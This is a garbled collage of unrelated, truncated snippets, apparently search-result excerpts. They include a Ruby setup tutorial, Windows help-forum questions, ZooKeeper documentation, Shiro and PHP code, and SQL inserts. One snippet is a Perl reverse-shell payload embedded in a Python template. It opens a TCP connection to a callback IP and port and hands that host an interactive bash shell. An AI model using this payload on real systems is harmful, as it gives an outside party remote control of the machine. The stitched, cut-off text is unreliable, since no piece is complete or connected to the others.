In Mac OS X, older versions of ruby will already be installed. But I use the Ruby Version Manager (RVM) to have a more recent version. You could also use Homebrew. In Windows, use RubyInstaller. (In most of this tutorial, I’ve assumed you’re using a Mac or some flavor of Unix...
insert into `sys_menu`(`menu_id`,`menu_name`,`parent_id`,`order_num`,`path`,`component`,`is_frame`,`is_cache`,`menu_type`,`visible`,`status`,`perms`,`icon`,`create_by`,`create_time`,`update_by`,`update_time`,`remark`) values (1,'系统管理',0,6,'system',NULL,1,0,'...
✅ How can I get admin perms back on my only account, or get my bitlocker key back:how can I recover my bitlocker key or get admin perms back. on my only account i managed to strip myself of admin perms. I have tried almost everything...
$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') ...
$message = preg_replace("#([\\>\\s\\(\\)])(www|ftp)\\.(([^\\/\"\\s\\<\\[\\.]+\\.)*[\\w]+(:[0-9]+)?(/[^\"\\s<\\[]*)?)#i",'', $message);returnmy_substr($message,1); } 开发者ID:badboy4life91,项目名称:Advanced-Sidebox,代码行数:7,代码来源:functions_...
zookeeper_st and zookeeper_mt. The former only provides the asynchronous APIs and callbacks for integrating into the application's event loop. The only reason this library exists is to support the platforms were apthreadlibrary is not available or is unstable (i.e. FreeBSD 4.x). In all oth...
DefinitionMap.put("/static/**","anon");filterChainDefinitionMap.put("/templates/**","anon");// 配置退出过滤器,具体的退出代码Shiro已经替我们实现了filterChainDefinitionMap.put("/logout","logout");//add操作,该用户必须有【addOperation】权限filterChainDefinitionMap.put("/add","perms[add...
✅ Why is it telling me my password is incorrect when i just signed in with it?:So my computer is on a local account, I want to connect my microsoft account to it and so I put in my email like it asks and then my password. It then...
function build_user_view_card($user, $view, &$i) { global $user_view_fields; ++$i; if ($i == 3) { $i = 1; } // Loop through fields user wants to show foreach ($view['fields'] as $field) { if (!$user_view_fields[$field]) { continue; } $view_field = $user_view_...
$query = sprintf("INSERT INTO auth_user \n\t(user_id, username, password, perms, subs_date, blocked)\n\tVALUES ('%s', '%s', '%s', 'user', '%s', 0)",myaddslashes(escape(uservar('email'))),myaddslashes(escape(uservar('email'))), $pwd, date("Y-m-d H:i:s")); ...